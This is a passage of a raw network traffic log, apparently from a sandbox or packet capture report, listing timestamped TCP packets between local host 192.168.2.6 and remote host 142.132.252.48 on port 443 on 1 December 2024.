                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234759092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234781027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.234797955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.240402937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.240421057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.240487099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.240494013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.240536928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254580975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254609108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254684925 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254700899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254715919 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.254740000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.256906033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.256927967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.256973982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.256985903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.257015944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.257030010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.262809992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.262831926 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.262908936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.262923002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.262968063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263367891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263386011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263428926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263437033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263461113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.263470888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.267759085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.267776966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.267843008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.267853022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.267893076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431452990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431493998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431591988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431613922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431638956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.431665897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.435934067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.435965061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.436008930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.436013937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.436043978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.436062098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441612005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441637993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441690922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441696882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441724062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.441734076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447206020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447232962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447273016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447278976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447295904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.447325945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452212095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452239037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452276945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452282906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452311993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.452322006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.457969904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.457995892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.458076000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.458084106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.458128929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463545084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463572979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463612080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463622093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463654041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.463661909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.468964100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.468993902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.469037056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.469043016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.469072104 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.469086885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.470120907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.632742882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.632769108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.632879972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.632890940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.632936954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.637373924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.637392044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.637469053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.637480974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.637552977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.642925978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.642944098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.642992973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.642999887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.643037081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.648489952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.648510933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.648576975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.648585081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.648621082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654217005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654243946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654295921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654301882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654331923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.654350042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659261942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659290075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659339905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659346104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659374952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.659394026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.664856911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.664895058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.664954901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.664962053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.664998055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.665010929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670267105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670300007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670336008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670341969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670372963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.670386076 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.833973885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.834007025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.834085941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.834095001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.834134102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839104891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839133024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839178085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839183092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839220047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.839236021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.844847918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.844877005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.844935894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.844942093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.844984055 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.849931955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.849961042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.850009918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.850014925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.850023985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.850054026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855458975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855490923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855542898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855551004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855567932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.855591059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861200094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861229897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861274004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861279011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861308098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.861326933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866070986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866101027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866153955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866158962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866193056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.866211891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.870245934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872138023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872165918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872203112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872208118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872239113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.872248888 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:55.877597094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.035345078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.035372972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.035481930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.035494089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.035537958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.040385008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.040404081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.040469885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.040477991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.040545940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.046129942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.046147108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.046201944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.046209097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.046282053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.051129103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.051151991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.051211119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.051217079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.051259995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.056726933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.056746006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.056797028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.056802988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.056840897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062511921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062541008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062577009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062585115 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062623024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.062642097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067734003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067759991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067819118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067825079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067858934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.067877054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073431015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073457956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073493958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073498964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073525906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.073538065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.236910105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.236943007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.237065077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.237071991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.237118959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.242124081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.242150068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.242218018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.242223978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.242269993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.247116089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.247143984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.247206926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.247214079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.247262955 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.252810955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.252835989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.252947092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.252953053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.253000021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.258407116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.258435011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.258503914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.258512974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.258562088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263489962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263514996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263562918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263567924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263607979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.263622999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269109964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269145966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269195080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269207001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269238949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.269258976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.274426937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.274456978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.274521112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.274528027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.274569035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.275532007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.438379049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.438410997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.438529968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.438538074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.438586950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.443435907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.443460941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.443531990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.443536997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:56.443578959 CET49721443192.168.2.6142.132.252.48
